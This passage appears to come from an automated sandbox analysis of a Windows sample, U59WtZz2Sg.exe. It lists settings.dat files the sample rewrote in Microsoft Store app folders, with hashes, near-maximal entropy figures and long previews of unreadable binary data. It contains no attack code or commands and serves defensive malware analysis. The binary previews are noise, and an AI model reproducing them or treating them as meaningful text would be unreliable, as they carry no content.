Preview:	regf.s..`[!n..:..Y.\|.. .;8.0Cz..8.........i.1."\|bQ.v.._.2...X....K+I...02.k.S.L.7.._.I......Ms#Z...J.......$;.l......7Rf2...<.K..T._.._......b.....`..8l8.PN.v..9.Yw"...jz-.P......?rn..R...@.D+X...B.O..v..fz?_..d..}.u......@....[..7!..;$..b??.J..^#.uXc.......F.....nl......-...)..#0...B6...T.,.B..=...F.31E0......I1.i%...8l4o......sV9...S..f.;....g.....u^k1R..1T.[.^......:.X.....r..@..^.T%..!.l....>r..k.2fB..SS..\|.\.v..c^V...dv....mn..b..`....T....#G.I(...@..s....nw..L~.....cc......i..y.......".....:.......P..e.Y.7.d....8.... .........5...I..3.V\|Hk.E.3.C.m...p(.p..u..,v.7.l.`.-..J{.........k..$.D...0...G...G...."dJ.n.Ey..W.wZ.w..1..H.?..Wv...p2..$....[.../6..85.......r.JJ .y.u.a.F..s........i......-..;..C..3)<..`.-.h..=...gR.>...q....'78x...d..X..=B..y@..@a..M..."V..TRyOKe.............5.. ..}...g4`.{.l......F2.H...zB8...@'.!...r.8.Z....~..............r.4....A\|..i.....I.6..7..~....]_...-M.....xO.....vL......-k.".t..0.....r.....066Y......#..!A

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979014648493388
Encrypted:	false
SSDEEP:	192:AC3eSvQEhAS/mOduEYEbsSGNOu7oKRVHuZHJ:ACuSvQEN/rZYEJGMuMMOZHJ
MD5:	2F1BCE1A1FAEF55F6AB3A0414E62B406
SHA1:	2D99C954D9ECC1D9C42174C694FE6183E5CC9C32
SHA-256:	B589FE8139EC5B546DB5EEBF1D89F9F08111C26EFFEA608FC341CF930DBB7E8C
SHA-512:	B7FE3942A16CCC6E77EF764DFFFC83569D5592AED30E35225A3D40714DF7B441CB35477A12D8BFDA12B67E14DFC35139BC0E82AB2C4992917BC399164C48F4CA
Malicious:	false
Reputation:	unknown
Preview:	regf....).1.[....A7....E!...2Z..<}..uv....v.0.M.R.KW.g@ja~..Y=..^.........O.).v......Zh.}sS.....`.&q,..`.P"....f.(Cr.~..q'.i.!-....='.4s.SI..5\|ip.mjB...)I.f.zUA.P.........sQ.....O/{#.\....p..h#.1..`.R.<..<.&u......k.N..)..6.g....~.@..GV[.&.9..DK.v#.B.Q.`g.e..y..%..69}....eY.F.Q7.........h.?:1....c<a.....=.....5:....[...:.!.;....].....h3.8.@E.[\T./.T...J..!.O.E..wD.G.......)6.F.....RQ...5....._..&..53J......b..w....N\|'....A..m......L...p._.m?....q(.2.J.j!g....C.X..r..o.....I.=."...3.j....F\|.2h...._....t.&wt.].c.....,.dh.5...].+B..E...0.......7I.w3......(._.]:.-.c.L.%......_.].6WV...S.W..&'4[.b...f}....V.;...._.0.....C.`..Xz}.q_5.&.......oW...........".zQ.z...<.1...neQ..;.:..K.)...gn......'..:..5..bPZ.5.C.. E..........f<.2.e..2...p.X.Q.....[....>....D+.W.....P...)...<.....dn,.j....U.,..zq()5..x...E......A...2..x~.U1.*U..~......4o.>..U......b..Gg4#!.%C....l.....-p....zPj..=.<..Ye.S...0.....j..{.~. .WPZ. f._!gl.=.X.g.3.f..V........?

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977280986032397
Encrypted:	false
SSDEEP:	192:fM98ar4RnP5cUk3QyNWhmR9YiAJvLpKVoq9sVr0w/sSfGfIq:f6zsXcUkAyNlYqP6YMq
MD5:	BCD9931CBB97AD5A813799B06C225AF0
SHA1:	12B88F2977C74D7C1646A65BA7EF5D94CB99830B
SHA-256:	C3ADE9E2D4F28CFE2C14257345844524AEE283018A2D5A8074AFD4003CC7AD0E
SHA-512:	5078F97C5BA4B1AFC8624ED2605CD96D42F5279598D0C9CBE27C88722A25ABE4A5B98D6108752C8EDED2A45D4A3BE0C667492F2FC7845D22FE24F4C50A237399
Malicious:	false
Reputation:	unknown
Preview:	regf.....GE(u...Y.L.<.z.@..' ..t.....?:.];.t...../T..J....Ve.Z..~....UU.DC2L.u'2.{W&....:....6....%Y?S..).<...l^[r......E.."Q...BP-5K.i.D....E.\.......\|.+..!>.Z...r..rW.=u 6.%...MF@...&.d....HI.,.V.Q.f.n0.S..e..v.LO1..%K.&.T...w..^..f.;.<..7.J.1.l....E.AJI........N,l..aJ.n....fI..l.O.=....)._..}.q.....5..?.A.H..B.v.....^6..0.5!...g..v....H\|.Yk-c...hF..M.gB?...b._q.;Nr......2.w......[..hlum....UF2.]..t.3%p.5....3\|..G.V.s\|T.J.Ao......ryh.m.Y/.../.&.8EAw=...0;x...X>.....F}.33.-.T..^.[.Z.^....\|g.(LB,.A1..9kf..;...P.....Rd..E......B.....O1..K.b.I..A\|..S.GZ.M..;.m..y.K............u...s.Q..Yc....v..b..\:.#./....$.X...R....h..0$l~.i.2..,..qd4...t.b{o.,.EN!)..........@..`.]v...>.Z...G.......Vpb.....*Q!..P...-.?=.3_...c....E....n..Z.........4H.`N4....2.ve...%.t...O...9....\|.8T..K&.8..E.x.lq,...h<.Q.1DY.............,"..dH....[.:X....`.7.>./~b...rHB.!..}..R].y.N..&......d.. @.Zs....U...x....r9,..'.. .....el...z..b\...b.l.........4.m....L..Cj4.f...

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974562152211873
Encrypted:	false
SSDEEP:	192:m3M2GCU2p9SY4DnB3+3yIZE0UDNkGiXir23Xpg:mcCpNgB3PcmNkGioY5g
MD5:	525BB2FB596A1E7A5EEEDD418599ACC2
SHA1:	4345A092A257192B54AE5E362BF83FE098119A0B
SHA-256:	B1CDBCA78B1EA3CBC6B95DB40AD2D2E228E636B0039DD63011AFF74B3CF6F522
SHA-512:	D62B25436EE00E967D0EF1C06ADFE5A58D1B9AAD01D1257F9CF55ACF9D2D1022C37DE71365FD29A84050FD78A9FE5E93038008543180CA2AA81B30399EEC5560
Malicious:	false
Reputation:	unknown
Preview:	regf.9}Q.8......9..m.........hVwVX~.t....aP.....Y....../=/...a.../..@..Z.$.u)Sx...CZI..../zV7.fC.m.1......3...MO...~..?\|S...E......!..p.2..QlB../...hZT.D.......7\...# ......j...O;.vy7".0.om.._.....%.d........QIq.......2..:..s..]k.w...{41,m....Y.........k..Y.....o.y......n0B.!......'.....zz:.j.6p...4Z...P.j$L....P8.x...3'.L.z.....87h.........F.n.*..~.....ue.3h#cq..:..`.1(.\..C.)..h_...{LZ...h...TH.Vv--,..u.nQbxZ..L{...{..o....A..t.........>1..p.?.....h...#...{...z$.{.....#"..p.r6~.4u.<.S)...I..2=Z.....\|CV..r........%L.H@z....wlJ}.......E....,........o2....(.7...E.Mj...Ef.[9.S.\.#..9N..1F..:.zX....,...T...x3....F.nqrf......p.x.X....C..o....kn.G..I.F.=z@...."....@[m.......4tw....`..yn(..u@!...jW..}.z$...7.i.A.O..........B;.V....i.......@....F......Z...?<......).....->a...L... ...%..\.....y...;..^..%.ATnC;....-...;...Hf.dG..pD:4W..-...N.V5....m...rLJ.q...\..@....m....../=...L+.+....!.O.e:B...,+ ...p..\|...w..a..o.Kf.6,.kU..P.2.......?...h.

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98009731776558
Encrypted:	false
SSDEEP:	192:ndkiJ92KseoGgc6AymdQU8vjf32mIFiicQGC5ogZdE:nGiJ92N7GgBAyJUBj8iLl5oWdE
MD5:	A814247EBA71EA4D82E0A64CC8C2AE89
SHA1:	7BDF818899D95E3E73F1BB982737A3B091D8681E
SHA-256:	9F3D6F66D9309E6883B60CB98E3B5919842272C6233CE252196347DF2091557F
SHA-512:	1960C66E9411E2AF2DFA22F2E5C75FD3566ED74030C6EC7F349A05A0137B6A18D8986D7113DC7805727A24988BC95D58F712FABA59687A9BD58F70CAB62998BC
Malicious:	false
Reputation:	unknown
Preview:	regf..a.5.W[@C.U.D.3pIK...@..........;..So.o.w./.b$....s.$<.5...Gg.-..%.l.'......%..V.l...j..O..........u.g2P\6c...M..U..>..vK..b..H&!.w7....kr.Q..f0.....u....v.Z..E9Z..V..8..w..2^.,..+2.y.s......"\|G.K.....`x..c4l..u.F.kU.%..U....UV.U....Q..J9.n. -0E.....'@...).c..t.#E...B....2[2........^...^..).V..{y.2.f.X...1e.I.}.:..#..-...#...xd.Ue.w..."..^:...4..O@..V...u<.....=dV.B...`.:wI.U.u..ZW&.q..Z.b....E[ .Q.N..6aC.......vx.2.u]...B....?......~I....M..mJ..M@.......m.35...9...;c........gn..T..I.o.(.......g.2I.....#.%=.P../.....[.H....n.....Fx...!,........m...7....$.....XJ. F.'......L..?< xZ.3i4.zr...`.u.....JPd6=.......:^...nB..1.e$e/..F{1..D..RV..:.....=ER@h..D}..A......r..)...V.....=...nC....w....`A..q..S..TV..A.....z...3h.j.%....T....&..?.;.t..P.......~..].i......rT..R.........a....?.......s......K.>..8C...^..(.........'.`..M/..<..h.......:5.J......#..W......q.^R...i......\...`mJ.y...L..q........P.XL8..M...9.x.dX...s0.m.b5....;"..<.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.983151031699798
Encrypted:	false
SSDEEP:	192:FS4Sy9pl51Ik+IihlAvG5uy9NKrUFzJZ5NDhXmqXUZHt/:R9pz1IkShEGkpUFzJOzZ
MD5:	F2D430D93975727E88D68D19520CCB9F
SHA1:	B78ECF4EFB2A0D4ED9891C0692354E6E765EEE0D
SHA-256:	C296F66277DE7FA2E70F25AFD7D91052AE84B26AEFF49442EAD3DACC91F740B2
SHA-512:	EC69C42C433B13F93F67DD3639191BF0E46A771DBF38DE77F3E78D2BFD15EA928A511CCDC8D8C16B2E99F5A8D895502ACA321E586741C8A39BD6598D32E3F0A5
Malicious:	false
Reputation:	unknown
Preview:	regf.y.Y.f^...r.w.nW0...sQ.....3.y.c.....s...^@v...s............>%.......7g...m8!3....kf.jI.O...:}......$....z}'....+.U?.~..K[k\|..[..R....mFNt. .2w$..]9.......r./..zuM........H....P.fr.....ZD\.....T.g.8,{.a......I@0..`.....4 ...1."....@..\....w;=.(.......3......D...Y.w...@.B...Tz..[..q!.]..R.KB}R2av...t.`...i......._./\|.Q...o.....Gvr!.......W.@uD..FU..%.x<.D1g..=.....B6..u..7{.)\.E...,T......"._n.V.ZP...J.q.B...;.C................P.u.'j.q.x...`&...g....K]y...s..qRz..........y.`..=..`.yg.T.j.CK.....=.?..?.W.u..5...y..`..E.!..D........YK..A...\.,K.T..#.Y.. .>....N..m.Q~..}......_.h.P).,O..E..'..._....T.vqpQN=Y.t..XO.c.AIAo.N3l.._(.(L........Z........oe.7....d.D..xK.eI\|XHH.Tb..q..WH.k.Gt..y....r...m\.A.....#..@.)...%D.Dl.:.IR&.vG.\|.PY.\...Yg...U{a..fV.Nv..6.......vm.A..g.Ac'..4.Q.V....ir\.....W.d...UL8../../H...9R...,)...S-.<......K...9..Q\..#L.0.;....\|..X..w.b/.K....m?..XL.{......_..............O...n....J.....\|o...[/........@Y...:).MK.3..

C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9771125920787815
Encrypted:	false
SSDEEP:	192:RMEP3iDPgX3pWJ7PitaoILXDwN6u5BY2WL1X/xPeSLELEAUEpW:RBiPE5WhIa1XDwP5BkL1X//GhpW
MD5:	A546547AF442ED638F1B4C98F8AF2137
SHA1:	2E246AAB9A28CF3070F5384BB699A68856FB7E02
SHA-256:	0A0A300CD02011F3BC8960B38DD174C094D62809511AE8E7EB7ABF0DC3F58C96
SHA-512:	3DE9272E657C821E7108F6452B24EDCEB2987D1EB86BFA97E314BFF3C0C75939C8E687B5787E7A7C5403837FAC05E9D9DFF47CF2BEC25479B68B2D9302335CEA
Malicious:	false
Reputation:	unknown
Preview:	regf......U....'_L..8T..U..I..J....S.:B(/...?\|..VW...W7...!.S.?-....$'....B...#....w.p....Q..1.Qi.@G.0./:-....Z...."..x;MAr...7%k.......p..z$W"y...fm...D.z.:...$..L....f.f..o=.,.(..Hyp>.Up...q...8...q.J~B../.....V...Wi...a......F....=.......g.$.u..`..._..B"...L>b.B..k..{A..+X.])......[ .1..R.-. +J..X.Tkzq..Oh.h....g!.....$P.tKHC#...r.tO.%s^1-..7.....0l...x..:K.:..n+.Q...........]G..O.:..C..DD..H.Z..6.$.i........'.2j....);eA.N.k..u.4.#.....Y...G$..y.J9..;..g.{..8E......%!Nt....[...^6...>f.l..MN3....&......B.......D...r.68g..,....5".0.K..h........ =A.fY.......L,W$..D.....zS..Z.j...nmW...........>..~m.[.F...............}.......u.P:.OD.&..s.]v._c....Jaa..@.>.....\|...Gy6..{....\..,m...[.q...YP8...jaJ:.T.S.}.:.]0.U.G..H.N.y-R:R).....!....a."3.9V.d...<N..ANg.).r@.\|wn.7.AX.p...(A..E$4.....!.}#.k....jx..t..&_`..m....F..k........;...G......9...v....C.N..1."*@...]..l......u.d.u.w..N.9....1..NX.{....,.....,.......)\|...+.\.6..%.O...v./.

C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975966295951921
Encrypted:	false
SSDEEP:	192:q+BcB+vE5H9WyinxkXGfjfoXXPZcIt6zBRqHzQaexzNCNJ7twO:qkcMvEeyixXf7oXf+zvczQDzAxl
MD5:	F6D2FDE4C6F1402319ED4BD38EFC9718
SHA1:	F391D71C33ACEDC78231A387B3EC8513E426BC6E
SHA-256:	60FEDE073850C2494785752EFA060F71DBF05369F6E1A10A792CB3CA8CAA026F
SHA-512:	233A59231880C843A6F5ED33A0C4A9C3CBC3F0851F04259597D08295840A479BC7D9BF6D3DF9E91E2F1C7D3ABBAF4C83301A92D33A5FCB7BD036B78A3485D58D
Malicious:	false
Reputation:	unknown
Preview:	regf..7bx..#T(..5.)F...UJ......h.....[....].t?Wf../<R.v.......P..^.]M...`.....mt.2.[..A..l..;0?..4..F."......C&J...O.._.E...d..E..T..A....'...&.........cY...l.w$!s...L(.e...@A.....4...L..+..w.......<J..eC.B..R.^..d.O...Q2.e..{@kV_^i.A..9.".Q.. .f_.A.....g!.9.~...a..y.n.........1k>Q<..-.a....C.i.B.B...^..B[.......4f1.H.A...QQ.....kHF.M,^...1.-&......K.^B..K...V.../I.g....F..A..J..;.....)i.+...'.%FUD.Z...Wq..o.....zR.GX.D.j\%m.=c.....=3.,..r..-.........f1..4..0G.!..ye...{...?B...gE.H.....:[...-'....j.UH....@..n;!.......s.G...........=?....#..]#.(..S/.%.Va-......q.-........;:......d... ..........R....&..o.s.=?.6f....S.b..........B...g..g...,.t.09.<..#.....q..8..#....a.....C..4(Y.3.?.K..=.F.#....N.>x&....@.u..L...BS..].....,.%.dV\|/.:.>0A.....xI...,NJ.....~.~..]U...J.Wr=.oNi...`a..../...6\@..p.,j...kF..e$@... H..6.e1..".f....5y.~.s.......%%...`~d.,..86...u..\|.q.8.aW$.V.i.t.........q...j...W>.cEa.=......}..O....s3.~.Ej..Mf@.GcF.....\

C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976487878239003
Encrypted:	false
SSDEEP:	192:E2VHj66QOHRLnigtDvgqyT/LbvJn/JTpGW76OFMbUO:359xL0Xb5NpnJO
MD5:	934F12A90277555AD3ACA5645D5FD534
SHA1:	9CCC60AE621E7DB78D9F91585FE8FF8541A1DA47
SHA-256:	836C8683A9E3DB0A851F873AD4CB827C49C6859E37432BD6C58E7D4BCDF06ADF
SHA-512:	66B0E5073232599D48C8B370288F189AF04390E68BB9A32AE095FFF92B85A487B2A00C7B8D490C19FB073FD0B202C60A5B18DBBDE5C8F1C9A3C40C84B695CC99
Malicious:	false
Reputation:	unknown
Preview:	regf...A&....%..b..&..?x_..8...8..^.jY.5.....4"BJ:.....Rd..:...!..cL...[..p.[E.....\|v{O..^..tt..0#....^7.6....J...o.9..d.......S......V.)........(g.....j...s...L8.....-.9.a.....NO/.}....p@..{..s..c...bG...?L.."..z%......`..5.h+...lP..8..9..MU.r"...tJD.rr.....b.....T.].g.-..k.s\|.(<.Gk......,.....s.[U =......N...%.@.....}......Y..m.g.. ..e.&.e...a6...}U..........Cq.}B'.\..~..B\|..>....N....E....sx.L......^.`....?......Md)..vD\|.%.yw.....'..Q....h...uKt..3...f...T..../.H.I.Y.y.zP...#...b..)F1.k4<<.........QG...'t./q......\.Laj.^..}u7,.3y. ...5..... S...c..O......_.\.wv..%..]....@...7z..R.lJ^..S....>`...G^yl...NB..F[..D.\|....W.&....5g..G.+.x....V)....-..#....~.dE..Sa.P'......r.........^..Tf.{+..=Y..a...@..i[;....^c.\|Q..P)...#.n..`..U...WY..:...HV<].J.}v&..\|(..i.@k..X.L.S.....wjE./%.L..G..H..G..Uv.$A.2D.M....e`m...>...T..!,.<8...0.%\i....]..h5.^...S.\|..b.......v#..p.kc..Uw6=8Y......R?._.].q.!..Nu...J..C.....h.`......R..0.3.xP.v.0x

C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.973999591719097
Encrypted:	false
SSDEEP:	192:TEe1koBzLN31bARgNbdkhjZ9WAEVY5oQifhJso6AtwDIyAmJe34:TOanN3SprWRY55iJJsfl7so
MD5:	C8C54D607943390751FFC5E1B715FFBE
SHA1:	A148A6D161713BF2DEB13E1F11DAEA297380EA85
SHA-256:	0F35A748C33BAFB0994428AE237B2BDFCA5CEE6A445C3892D478D6B3F67876F5
SHA-512:	9E1937CD9D9A79BE1D0AB0818A091CCCB71F095274B8FBCAFCE210E68E19FC5C1AFEF1FF966F10495296D14466029E5AE1BD664D37654CDD4283E9564B1881E2
Malicious:	false
Reputation:	unknown
Preview:	regf...-...2..j. Ta..<..C....+U.k=m..3v.p..K.?m+..].Gi=V...i._).!t.....Ddt.k.1.`.......K49I..[.F...#.+s:.}......r..h.a....H.@.....#_W.(......w..7x.Z.5..W..BjY.....a.W,#.y].%b.NB.~H.p~...'..p.r...#Q.O....<..z.n..U..#.;.3.]..O.u2.b..J.;.P..6.Jg.L.......kI.Y.D..J.j.=i..:s...........eF..zE6!.E.J.h..wr.BN.].S.]...........7P....0.......k...-...MH6.8.....@{4..L\|..m.,.(.....J..m%0%..&..ZpTi.>..~!....w.&P.......$.=.Z....B.}&..#;x..\|..../.'(..=...py...%+?)e>_....)..%...US*T....kk.e\.......^J\..`0L4..K.~....-.8.q....d...Zb....2cK6.'}..+..%..^M.}>.......w.@.>.....&.i.4.....`%...N.Ou..0..X.4...iNM. .\K..{...~.......~.(.L...(q.T.".<..g-..y.O..e9xN....._........3.\|....@...8s....9k.3.\|qW...p..... G@......WDG.1`..C........q.gA.E..A.......W...o.1.y...G@..6.Hz.3`.L.c<.uw..[.I.&..8....Rf.M..@j.. [.k.qMOl...Cs..K..r;.$.+..&.dj.I.jCT/?..'2.!.b.'-........U.1.I.T.......<....dd;......$.:4Aw...E..Z......%...,...../...7.M..,.q.9A.=z..,-D..2.<..O..2....Fl.^...

C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978360128052729
Encrypted:	false
SSDEEP:	192:LZXYvdkdP0OVpniSijgmLA313z2FTHVa30vWSp/38ItkYPVDY:iHa/HmLuxA1IUvdPVU
MD5:	E6B58EA47C04AFABBA089AE8A73D697F
SHA1:	0BDEDBD97D3D0C2E86AA0AA1AFAC47850F669D3B
SHA-256:	F0784C7FFF6D6D07E22296CA80102AE41F75E032B3EA219D95D1946D32A11F21
SHA-512:	8D93D867DB8BBFDDF71952D61BFFDC4A3D40B8F68538CD4A670A02A934E5D1EB991497FBB5272D04F898FBEE35FC3D4B25A7F8D803490DEB6F9E874AD43074DD
Malicious:	false
Reputation:	unknown
Preview:	regf.i.Gq.GQ.\|%...W.?...=A...k..L%..B....J\.....n....4....z.".(.u<Etp..m.~....F .3q.h.vg;......}..~(.=L.u..O-........A.o....D.2..G:N...&N.k....."U..a.b.#..O.......>..5MtF..`d.(.p..`..A.>u8..9^<O.^Nz.\t...0t0lEK0...%......\|.{.0.T.!.y.TP..J.o.......^S...C...9.\8..XaxZ.uO.1~.I...#d~t!...=8.....}....E..6=q.=K...5..........?......&.G.K..T.epefgT....'......4e5..."...\,..t.0.X.[r....i./...=qH2.....H..^nqa..RU...........z9)k.{m-..."..3.[..l.2.s.-.....s...F...&d...^)mb...<...N..]....b...u.q.Zk`..P..Zm]..&...k\.. P.8.I/.h.u....y..1....H.....C.+._c....?eg..F...n=...........u;.......~..a...L_..G..H..K/..`gITO.\|.9nU.!.Uc\|.._.O...7.W}..x..`......d.......Q..%..x.4z.kg..d8...WI.&qQk.#...<J.........>]..x....u..8 N..(J\..'g/...0.sc\!..7%...t....E.G........C.....}..N. ..wZ.G.=>b.....si.M..f..B@w....j.G.9...YH]i....C...m..j..X.@.......v-u..F.....%.u.<....M0...}&..=.r5....q....;{...{9...z6...]....z......o..T5..{..8i.%.E.76.].%5.w..T2.u+<^v.P.....v\|).

C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980706279280975
Encrypted:	false
SSDEEP:	192:h/mAz4NzFJkiV7QOhgjyfT6+WW4mIoWOYbSQdwOp:pXq7uOhgj8KPoWOMSQdwC
MD5:	20B39F3C4D8D384CFBC4D68A3B95D818
SHA1:	092BEFD550E1D3E9098EF53407C092CEA5F500C8
SHA-256:	C1FA91DCC919870938E27E29DBA4C239FE39396ADA45FA61A6FCA1EBBF83704C
SHA-512:	5AA555A6A3AC406C626C26D6FB24A4D65D0CD4AA72E9D733679315D2491A7CE04B20055C305094F57A78C2C9878A68CC878D733FF9FC60FB12EC0D2F18A34EB5
Malicious:	false
Reputation:	unknown
Preview:	regf....@h.`(......P.&.R..6..td^tZ.....f.?Q.{...<V.=..R..?...s...Z.Znm...].L..G<.A...-..h)S#.W.;?..J.V...\H...<...u.Hf..w.Ql.#s/O...7.b...NcK.....\|....Ml..W...zM.!..........-..b..6..q9.@w...6..........S....ARC.3U. ..........dzy.Uy.5.............H...a.R....%w.z.....3...I..[TT[.{A.........."...j.G.KrxZ.......-.b.7...HW.A.)N.J.....7. RI_....W.~...m...s.X.c..f.by....X)(.i.0..x.M..).'.BP...<6........T.D&...~..j..+r~......jd.\|.V.22MW...M/Z*..#Q......;u.}.w.t.{!v..pp..$.....=.!.:....04.oP...a6.B.~u..1..q=.n.....Y..Uw.A...e......zx..uRP...<JQ..5.r.....B.._TUra.n!..VAqG~.z.V.2.....Q....Z.a.$.q[.....{......:.qF.4F..)).kGI......<...a;.l.Q/...b?Y.}.=Fe`..\|.{.....~x6.d..U7..1.f......S..n.rij.I.8........Z..:..mJ...Wms^rn..?..N.. ..U...#..+.'".1.&dNK..D.J..U....G.>...n.I.l>oMl.{<Vu....?........Z.......ww,.K....i34.......W..............+.....$..\|.^........2...3.7 'z.......by6(..0..D.]......).IK.A.~.#..&...v.$[Q5'......F.!.W..H_.."I6=.....~...^h

C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979372012982651
Encrypted:	false
SSDEEP:	192:/H1HlKWK1ClCNxlZW1ylVZYjp5wMJu/F9l50V6:/DlMvcg3ZQ3wM4J50E
MD5:	D9700D40C2FF2C83C40A2E2032EF1AB4
SHA1:	F51FEB4ABD664D127DF0580DD4007E7B5416CB38
SHA-256:	B70259C00C42282CD52A58FAFA4D27BADE34756B17B98F92351AAA4A03CB6646
SHA-512:	9EC1BC5DE276F71156D88221E86E0C390F8F472AB995B0F71FE6A78041B6B0BAEE571DCC73BD46CC80047B5FABF2C854D6130B48C6790E5761EE10269EC28BF8
Malicious:	false
Reputation:	unknown
Preview:	regf......g.p'.......(a4O.]7...@...G...y..e..`...W...C.s....Qf.+Z.......l...q[......g.?.rFJ_.......c.....z.X.n..=VH}nN..8..V...E.......<Etl.J....t.......F-. .@..n?..V..5,...3... ~_f.033..H..u.."..m(....1[.+(..p....I...O..X.a...@.7..9.........s.F.8q....B.H$JG.\.=...?..&....Rm.VII..'V.MKW..5f.V.%...2n.!...'.:..d].....Rc..uN.f.0)1.....x....'..?...lh......=...'..!......=al.....O...:Z..(....j..x...!zZK...!...Li...R.'....b.c.m.[.....%..c3....r...%.T.j....U...(......q_.]LV\|27.....\.0. <..9..T.6..(.x.O.....L-]....=z....l<...Q....0....4..m+..hW....-f8..I..`8P..9J.eCj..".Ht...V.....`\....?6....4/....I.E..... ...M0.K8.}k4..._8...-4.!...UCT.......o..HN...o....J-O].`v.g..89.\.....@fk!.O.`.C..d..p8.N..d..y.a..X...M>..f.Bz..w.}.._....w.9...3v.`..+.F....K.8.F.U7..~..N.,^4......L0....Z.TU.&de....#=.+7..&h..l............}.^.0!.1#.A..Ap....... .b.b..V......9exg..)s......q.].<..o>t..#?3l.m>1:h=....\|...@..s..?<.u..-....M.$....k.....o..E!..>b.Uk..E.....rk...Z.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974609101199201
Encrypted:	false
SSDEEP:	192:Rl8Sql/muScVe/KqODrI5C7HtWq/G2jPJm2/P1EFFcbYQvQ:D8xlpSpO/IE7NBbj42/dEP2YQvQ
MD5:	36E8A5185AA3B00746DE1CAD93C6674A
SHA1:	2DB970EB3FDEB9E339E079381A4C10A8FADB5C13
SHA-256:	B219DC1E80439179F8CE58BA86EE1E3908E32C97F21703FE256733DFD48BF52B
SHA-512:	F9BEC2E9F2485BFDDD1EC2DD36E9CA4686A4369028B4C7B40A471CB17FEB482DFA8429A6794CFE6E29AA5B886244241F4411E0B7C1E42A456175C042C5D12164
Malicious:	false
Reputation:	unknown
Preview:	regf.:8....\sp...3...f.'.L.I5.x...'.k.w...%l...."....v5..;+...\|V..M.1Q.xv.... 6..l.....:..E....<.L.......Q%.@zT.U..y....8>2)....&E{x.2r.!L..........{$...p._.K=a..t..m34{..&...L.>..F.5.?...n..G.....s.@.a...y...J..,:.".V ...]g.+......3........P..$y$.7.OLe.6.nLG....i.....{zl.X..@...K.{....'.,yK...3j.8/..........8..Qv...h.kX..3._..H.4Y.:.....]z.7...+G.;V.2x...;...%...@......y9.r..1.z.f.......s..CI.....W..T.....)*._.Nt..2...j+...'Bu#..8'".v"T..-.fP...a...<{....h.....a...j.".[g..@...J..,...Gw....I..k..3..^E.:c...5...L4...E......O....:.J.mvo....f^3..b.D.M.q(<\.z^...%o..J...W.\..?.........{B....UO....q.~.....$...-.w........i.'..P.2:...'....f..2..:..M.....Z.$.V.Qm..DJ...EE.@.n:....[.7J~.zn&l2+R.:..n..........@...]P.F.ran.`m..m%.8...x.[~.s(.].M.)<...U....r$.R.............r..b...R.....o'8..}....^..l.....'.H....i.i.z.%..=F...a;.....W..~.8..T.d...O.7..O(...}....."...A....t...iu.lt...,....(f.u.&..}..8D\|.}N...0...p.oa..H]...)..>.\|...)[E.38=...e.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974975996164974
Encrypted:	false
